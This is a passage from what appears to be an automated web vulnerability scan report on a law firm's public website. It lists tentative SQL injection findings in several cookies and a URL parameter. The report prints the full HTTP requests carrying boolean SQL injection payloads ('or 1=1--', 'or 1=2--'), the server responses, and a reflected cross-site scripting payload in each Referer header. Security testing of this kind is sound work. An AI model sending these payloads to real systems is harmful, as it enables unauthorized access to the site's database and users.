
Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=67778256'%20or%201%3d2--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:36:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.32. http://www.pillsburylaw.com/a [PCUSERNAME cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The PCUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 79438194'%20or%201%3d1--%20 and 79438194'%20or%201%3d2--%20 were each submitted in the PCUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=79438194'%20or%201%3d1--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:36:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCUSERNAME=;expires=Thu, 13-May-2010 00:36:25 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=79438194'%20or%201%3d2--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:36:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.33. http://www.pillsburylaw.com/a [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 20667745'%20or%201%3d1--%20 and 20667745'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a20667745'%20or%201%3d1--%20 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:37:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /a20667745'%20or%201%3d2--%20 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 13 May 2011 00:37:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.34. http://www.pillsburylaw.com/a [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 80264836'%20or%201%3d1--%20 and 80264836'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.480264836'%20or%201%3d1--%20; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:34:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Thu, 13-May-2010 00:34:26 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.480264836'%20or%201%3d2--%20; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:34:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.35. http://www.pillsburylaw.com/a [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 86405570%20or%201%3d1--%20 and 86405570%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704686405570%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:36:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Thu, 13-May-2010 00:36:56 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704686405570%20or%201%3d2--%20

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:36:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.36. http://www.pillsburylaw.com/a [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

